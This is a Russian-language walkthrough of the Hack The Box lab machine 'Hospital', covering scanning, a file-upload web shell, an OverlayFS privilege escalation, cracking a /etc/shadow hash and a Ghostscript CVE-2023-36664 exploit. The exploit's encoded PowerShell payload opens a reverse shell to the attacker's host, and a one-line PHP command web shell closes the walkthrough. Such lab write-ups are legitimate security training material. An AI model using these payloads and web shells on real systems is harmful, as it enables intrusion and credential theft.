Обзор сервисов
Проведем стандартное сканирование портов машины 10.10.11.241 с помощью rustscan:
$ ~/apps/bin/rustscan --ulimit=5000 --range=1-65535 -a 10.10.11.241 -- -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.241:135
Open 10.10.11.241:139
Open 10.10.11.241:88
Open 10.10.11.241:593
Open 10.10.11.241:636
Open 10.10.11.241:1801
Open 10.10.11.241:2103
Open 10.10.11.241:2105
Open 10.10.11.241:2107
Open 10.10.11.241:3389
Open 10.10.11.241:53
Open 10.10.11.241:464
Open 10.10.11.241:445
Open 10.10.11.241:443
Open 10.10.11.241:5985
Open 10.10.11.241:6407
Open 10.10.11.241:6409
Open 10.10.11.241:6404
Open 10.10.11.241:6406
Open 10.10.11.241:6613
Open 10.10.11.241:6618
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.10.11.241
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-18 14:01 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
Initiating Ping Scan at 14:01
Scanning 10.10.11.241 [2 ports]
Completed Ping Scan at 14:01, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:01
Completed Parallel DNS resolution of 1 host. at 14:02, 10.75s elapsed
DNS resolution of 1 IPs took 10.75s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 14:02
Scanning 10.10.11.241 [21 ports]
Discovered open port 139/tcp on 10.10.11.241
Discovered open port 445/tcp on 10.10.11.241
Discovered open port 135/tcp on 10.10.11.241
Discovered open port 6404/tcp on 10.10.11.241
Discovered open port 6613/tcp on 10.10.11.241
Discovered open port 53/tcp on 10.10.11.241
Discovered open port 3389/tcp on 10.10.11.241
Discovered open port 2103/tcp on 10.10.11.241
Discovered open port 443/tcp on 10.10.11.241
Discovered open port 5985/tcp on 10.10.11.241
Discovered open port 6407/tcp on 10.10.11.241
Discovered open port 464/tcp on 10.10.11.241
Discovered open port 6618/tcp on 10.10.11.241
Discovered open port 2105/tcp on 10.10.11.241
Discovered open port 636/tcp on 10.10.11.241
Discovered open port 2107/tcp on 10.10.11.241
Discovered open port 6406/tcp on 10.10.11.241
Discovered open port 1801/tcp on 10.10.11.241
Discovered open port 593/tcp on 10.10.11.241
Discovered open port 88/tcp on 10.10.11.241
Discovered open port 6409/tcp on 10.10.11.241
Discovered open port 8080/tcp on 10.10.11.241
Completed Connect Scan at 14:02, 0.15s elapsed (21 total ports)
Initiating Service scan at 14:02
Scanning 21 services on 10.10.11.241
Service scan Timing: About 61.90% done; ETC: 14:03 (0:00:32 remaining)
Completed Service scan at 14:02, 55.08s elapsed (21 services on 1 host)
NSE: Script scanning 10.10.11.241.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:02
NSE Timing: About 99.97% done; ETC: 14:03 (0:00:00 remaining)
Completed NSE at 14:03, 40.05s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:03
Completed NSE at 14:03, 1.65s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Nmap scan report for 10.10.11.241
Host is up, received syn-ack (0.084s latency).
Scanned at 2023-11-18 14:02:04 EST for 97s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-11-19 02:02:11Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
|_http-favicon: Unknown favicon MD5: 924A68D347C80D0E502157E83812BB23
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl? syn-ack
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-06T10:49:03
| Not valid after: 2028-09-06T10:49:03
| MD5: 04b1:adfe:746a:788e:36c0:802a:bdf3:3119
| SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
| -----BEGIN CERTIFICATE-----
| MIIC+TCCAeGgAwIBAgIQdNv8q6fykq5PQSM0k1YFAjANBgkqhkiG9w0BAQsFADAN
| MQswCQYDVQQDEwJEQzAeFw0yMzA5MDYxMDQ5MDNaFw0yODA5MDYxMDQ5MDNaMA0x
| CzAJBgNVBAMTAkRDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA7obA
| P53k1qyTGrYu36d3MfqWRf+nPEFi6i+GK7/8cOoQfQPjPNMMHcmzHaFgkOdAcv12
| jctNzQYh6xUQY5R3zqjXlJyRorftvBlKDU02S4EOKsdytnziHbHG5ZEvRDoCgVH3
| uvt4U7cqwk1uE0r6iWwegK/xxtTVBPkObmepjTO1DEMyj8j6UU9jwyCH8jE5VTCC
| UiWJI/q+B/tcJcINfFerv4oDagptKrMAIfsX+ReqbZojCD5EREjMUyn+AigZTeyS
| ksesM2Cy6fkVkypComklqJw2YIIlDnPxdh3pAwjyUlbcb6WwE5aEKwuEgyRyXHET
| EKwcUBIa7y3iRSVCpQIDAQABo1UwUzAOBgNVHQ8BAf8EBAMCBaAwHgYDVR0RBBcw
| FYICREOCD0RDLmhvc3BpdGFsLmh0YjATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNV
| HRMBAf8EAjAAMA0GCSqGSIb3DQEBCwUAA4IBAQBjA0NUb25R42VBXvb328jEcMam
| 19VS+MPZijp14phJ0Q/YuxlztTGnSlIFrUPWtJWvx8PLtdCnE1MOmFmcS2TNISg9
| Vt1sE4RF5N9s9TeFqCE80wH+qzZMCaBTlQxrzftkTfN67+SxoEGd6aywXEmzG5tw
| wbEe/dMglJVZ0Uk2DUXjpdXIDQlFIg+Yn0CqWjUvppLUyinxpmVqoC5dY8ijuuem
| 3JjZd5mDoYg1XIP3gfAAutdsce5Safoq7oqh0OYb4sQMu0y9YcRL0JsP3cwB4FnW
| eh2XVUa9NjHJi5hvdH3wy6/jU4UwPED41iuM6Y1rwF/l4J0LmELsmmYZEaWm
|_-----END CERTIFICATE-----
1801/tcp open msmq? syn-ack
2103/tcp open msrpc syn-ack Microsoft Windows RPC
2105/tcp open msrpc syn-ack Microsoft Windows RPC
2107/tcp open msrpc syn-ack Microsoft Windows RPC
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HOSPITAL
| NetBIOS_Domain_Name: HOSPITAL
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hospital.htb
| DNS_Computer_Name: DC.hospital.htb
| DNS_Tree_Name: hospital.htb
| Product_Version: 10.0.17763
|_ System_Time: 2023-11-19T02:03:00+00:00
| ssl-cert: Subject: commonName=DC.hospital.htb
| Issuer: commonName=DC.hospital.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-05T18:39:34
| Not valid after: 2024-03-06T18:39:34
| MD5: 0c8a:ebc2:3231:590c:2351:ebbf:4e1d:1dbc
| SHA-1: af10:4fad:1b02:073a:e026:eef4:8917:734b:f8e3:86a7
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQJ8MSkg5FM7tDDww5/eWcbjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9EQy5ob3NwaXRhbC5odGIwHhcNMjMwOTA1MTgzOTM0WhcNMjQw
| MzA2MTgzOTM0WjAaMRgwFgYDVQQDEw9EQy5ob3NwaXRhbC5odGIwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCsE7CcyqvqUyXdwU9hCSyg21qHJ3DGvSiq
| y9+Afp91IKJd35zkbYgFubrF5F4FLUzcHfcrNdBTw6oFMdNZS5txnjVIQfxoCk1f
| EUnONlIEdi9cattgsEzsNRRG9KJoLrNBIVyYAluMzSoaFF5I0lhSWTlv0ANsdTHz
| rzsc8Avs6BkKLsc03CKo4y3h+dzjWNOnwD1slvoA/IgoiJNPSlrHD01NPuD2Q93q
| 5Yr1mlbx9aew2M4gsEH1YO8k6JfTmVQNLApOVlhlRP/Ak2ZBCJz74UWagufguTSG
| dC/ucQHwe3K7qMD+DpxhMm5XaupkQFvxZdb6fQ8f8wgS6RhM/Ph9AgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAXe9RRGaMAiYnxmhDqbb3nfY9wHPmO3P8CUgzWvA0cTKSbYEb5LCA0IBK
| 7v8svFcAQM94zOWisTu54xtuSiS6PcHfxYe0SJwl/VsZm52qt+vO45Zao1ynJdw/
| SnIeAIKktpq8rZZumYwy1Am65sIRZgw2ExFNfoAIG0wJqBDmsj8qcGITXoPUkAZ4
| gYyzUSt9vwoJpTdLQSsOiLOBWM+uQYnDaPDWxGWE38Dv27uW/KO7et97v+zdC+5r
| Dg8LvFWI0XDP1S7pEfIquP9BmnICI0S6s3kj6Ad/MwEuGnB9uRSokdttIDpvU4LX
| zXOe5MnTuI+omoq6zEeUs5It4jL1Yg==
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6404/tcp open msrpc syn-ack Microsoft Windows RPC
6406/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
6407/tcp open msrpc syn-ack Microsoft Windows RPC
6409/tcp open msrpc syn-ack Microsoft Windows RPC
6613/tcp open msrpc syn-ack Microsoft Windows RPC
6618/tcp open msrpc syn-ack Microsoft Windows RPC
8080/tcp open tcpwrapped
| http-title: Login
|_Requested resource was login.php
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.55 (Ubuntu)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 23222/tcp): CLEAN (Timeout)
| Check 2 (port 22209/tcp): CLEAN (Timeout)
| Check 3 (port 23197/udp): CLEAN (Timeout)
| Check 4 (port 20833/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2023-11-19T02:03:02
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:03
Completed NSE at 14:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.99 seconds
Проверим, какие еще домены отдает DNS-сервер:
$ dig any hospital.htb @10.10.11.241
; <<>> DiG 9.19.17-1-Debian <<>> any hospital.htb @10.10.11.241
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47248
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 8, AUTHORITY: 0, ADDITIONAL: 4
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;hospital.htb. IN ANY
;; ANSWER SECTION:
hospital.htb. 600 IN A 10.10.11.241
hospital.htb. 600 IN A 192.168.5.1
hospital.htb. 3600 IN NS dc.hospital.htb.
hospital.htb. 3600 IN SOA dc.hospital.htb. hostmaster.hospital.htb. 478 900 600 86400 3600
hospital.htb. 600 IN AAAA dead:beef::140
hospital.htb. 600 IN AAAA dead:beef::8a13:3848:1b43:e9a
hospital.htb. 600 IN AAAA dead:beef::213
hospital.htb. 600 IN AAAA dead:beef::21e2:3f2:22f:1e4c
;; ADDITIONAL SECTION:
dc.hospital.htb. 1200 IN A 10.10.11.241
dc.hospital.htb. 1200 IN AAAA dead:beef::140
dc.hospital.htb. 1200 IN AAAA dead:beef::21e2:3f2:22f:1e4c
;; Query time: 52 msec
;; SERVER: 10.10.11.241#53(10.10.11.241) (TCP)
;; WHEN: Sat Nov 18 14:10:17 EST 2023
;; MSG SIZE rcvd: 321
Добавим домены в /etc/hosts:
$ sudo nano /etc/hosts
10.10.11.241 hostpital.htb dc.hospital.htb hostmaster.hospital.htb
Web
Регистрируем аккаунт и входим.
Поищем папку загрузок:
$ gobuster dir -u http://hospital.htb:8080/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://hospital.htb:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 302) [Size: 0] [--> login.php]
/.php (Status: 403) [Size: 279]
/images (Status: 301) [Size: 320] [--> http://hospital.htb:8080/images/]
/login.php (Status: 200) [Size: 5739]
/register.php (Status: 200) [Size: 5125]
/uploads (Status: 301) [Size: 321] [--> http://hospital.htb:8080/uploads/]
/upload.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 317] [--> http://hospital.htb:8080/css/]
/js (Status: 301) [Size: 316] [--> http://hospital.htb:8080/js/]
/success.php (Status: 200) [Size: 3536]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/vendor (Status: 301) [Size: 320] [--> http://hospital.htb:8080/vendor/]
/config.php (Status: 200) [Size: 0]
/fonts (Status: 301) [Size: 319] [--> http://hospital.htb:8080/fonts/]
Progress: 17474 / 175330 (9.97%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 17475 / 175330 (9.97%)
===============================================================
Finished
===============================================================
Можно загружать файл, но ожидается картинка. Файл никак не переименовывается - загрузив logo.png, получим /uploads/logo.png. Расширение php не подходит, но подходит phar. Воспользуемся p0wny-shell и загрузим его.
Мы помним, что машина работает на Windows, но мы попали в Linux. Вероятно, это WSL2.
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:15:5d:00:8a:02 brd ff:ff:ff:ff:ff:ff
inet 192.168.5.2/24 brd 192.168.5.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::215:5dff:fe00:8a02/64 scope link
valid_lft forever preferred_lft forever
Стабилизируем шелл:
Креды базы данных:
Посмотрим на версию ОС:
$ uname -a
Linux webserver 5.19.0-35-generic #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/os-release
PRETTY_NAME="Ubuntu 23.04"
NAME="Ubuntu"
VERSION_ID="23.04"
VERSION="23.04 (Lunar Lobster)"
VERSION_CODENAME=lunar
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=lunar
LOGO=ubuntu-logo
Похоже, что мы можем получить в контейнере root с помощью уязвимости в OverlayFS (CVE-2023-2640, CVE-2023-32629).
cd /tmp
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /tmp/bash; chmod +s /tmp/bash")'
/tmp/bash -p
После получения суперпользователя в контейнере мы можем читать любые файлы. Попробуем прочитать /etc/shadow:
$ cat /etc/shadow
root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::
...
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:9999
...
Пробуем сбрутить учетную запись drwilliams:
hashcat -m 1800 -a 0 hash.txt rockyou.txt
С полученными кредами можем войти в почту (нужно дописать в логин @hospital.htb).
Второй доктор просит прислать нас файл .eps для ghostscript. Находим PoC эксплоита и пытаемся приготовить нагрузку.
python3 CVE_2023_36664_exploit.py --generate --payload "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAxADQAIgAsADQAMgA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" --filename shell -
-extension eps
Отправляем в ответе на письмо наш файл и ловим шелл.
Флаг пользователя
Повышение привилегий
В каталоге C:\Users\drbrown.HOSPITAL\Documents посмотрим на файл ghostscript.bat и вытащим оттуда пароль текущего пользователя.
С помощью этого пароля подключимся к RDP:
xfreerdp /u:drbrown /v:10.10.11.241
Обнаружим папку со скриптами C:\Users\drbrown.HOSPITAL\Documents\scripts, которой уже нет (в ней должен был лежать файл ssh_root.vbs).
Откроем notepad и подождем, через какое-то время запущенный скрипт напишет в блокнот креды в открытом виде.
Это происходит из-за скрипта для Selenium, который должен открывать почту и вводить пароль.
Переподключимся к RDP как администратор.
Повышение привилегий 2
Мы можем писать в C:\xampp\htdocs.
Добавим файл C:\xampp\htdocs\t.php с содержимым:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Теперь в браузере выполним http://hospital.htb/t.php?cmd=whoami:
Далее получаем интерактивный шелл любым удобным способом.
Флаг суперпользователя
